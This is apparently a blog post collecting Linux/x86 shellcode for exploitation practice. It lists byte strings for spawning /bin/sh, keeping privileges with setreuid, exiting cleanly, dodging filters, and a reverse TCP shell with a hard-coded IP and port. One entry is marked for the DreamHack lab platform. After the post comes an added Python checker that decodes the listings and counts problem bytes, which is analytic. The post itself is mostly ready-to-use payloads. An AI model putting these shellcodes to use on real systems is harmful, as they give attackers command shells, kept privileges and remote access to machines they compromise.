ghkdtlwns987

[System] Shellcode collection

2020/03/31 2020. 11. 16. 00:03

0x01. The most basic code for spawning a shell

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 25

Not included : setreuid(), exit()

 

0x02. Code that also exits cleanly with exit(0) when the shell is closed

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 31

Not included : setreuid()

 

0x03. Shellcode that also includes setreuid(geteuid(), geteuid())

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 41

 

0x03. Shellcode that also includes setreuid(geteuid(), geteuid()) and exit(0)

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 47

 

0x04. exit(0) code

\x31\xc0\xb0\x01\xcd\x80

bytes : 6

 

0x05. setreuid(geteuid(), geteuid()) code

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

bytes : 16

 

0x06. Linux/x86 execve /bin/sh shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

bytes : 23

 

0x07. Linux x86 filename shellcode

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

bytes : 48

 

0x08. setreuid(geteuid(), geteuid()) system("/bin/sh")

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff

bytes : 54

 

0x09. Shellcode without 0x2f

\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3

 

0x0a. Reverse TCP shellcode (84 bytes)

("\x68"+
 "\xc0\xa8\x7e\x8c"+        #<-    Client IP_ADDR
 "\x5e\x66\x68"+
 "\x1e\x61"+                #<-    Client Port_ADDR
 "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"+
 "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"+
 "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"+
 "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"+
 "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+
 "\xeb\xce")

 

0x0b. Ubuntu 16.04 shellcode (for DreamHack) (len 26)

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
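Added example (not part of the original post): a small analyst-side checker that turns the \xNN listings above into raw bytes, reports their length, counts the bytes that usually break delivery (NUL, LF, and the 0x2f that entry 0x09 avoids), and counts int 0x80 sequences. It parses the listings exactly as printed, so the lengths it reports are those of the bytes actually shown; the three entries in ENTRIES are copied from 0x01, 0x09 and 0x0a.

```python
import re
from dataclasses import dataclass, field

# One "\xNN" escape; quotes, '+', '\' and '#<- ...' annotations are skipped,
# so both listing styles on this page parse.
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# NUL ends C strings, LF ends a gets()/fgets() line, 0x2f is what 0x09 avoids.
BAD_BYTES = {0x00: "NUL", 0x0a: "LF", 0x2f: "'/'"}

@dataclass
class Report:
    length: int
    bad_bytes: dict = field(default_factory=dict)  # byte value -> count
    int80_count: int = 0  # occurrences of "\xcd\x80" (int 0x80)

def decode_escapes(text: str) -> bytes:
    """Raw bytes of a \\xNN listing, single-line or the 0x0a multi-line form."""
    return bytes(int(h, 16) for h in ESCAPE_RE.findall(text))

def inspect(shellcode: bytes) -> Report:
    """Length, bad-byte census and a substring count of int 0x80. The count
    is a heuristic, not a disassembly: cd 80 can also sit inside an immediate."""
    found = {}
    for b in shellcode:
        if b in BAD_BYTES:
            found[b] = found.get(b, 0) + 1
    return Report(len(shellcode), found, shellcode.count(b"\xcd\x80"))

# Listings copied from entries 0x01, 0x09 and 0x0a above (constructed input).
ENTRIES = {
    "0x01": r"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
            r"\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80",
    "0x09": r"\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3",
    "0x0a": r'''"\x68"+\
"\xc0\xa8\x7e\x8c"+\        #<-    Client IP_ADDR
"\x5e\x66\x68"+\
"\x1e\x61"+\                #<-    Client Port_ADDR
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"+\
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"+\
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"+\
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"+\
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+\
"\xeb\xce"''',
}

if __name__ == "__main__":
    for name, listing in ENTRIES.items():
        print(name, inspect(decode_escapes(listing)))
```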
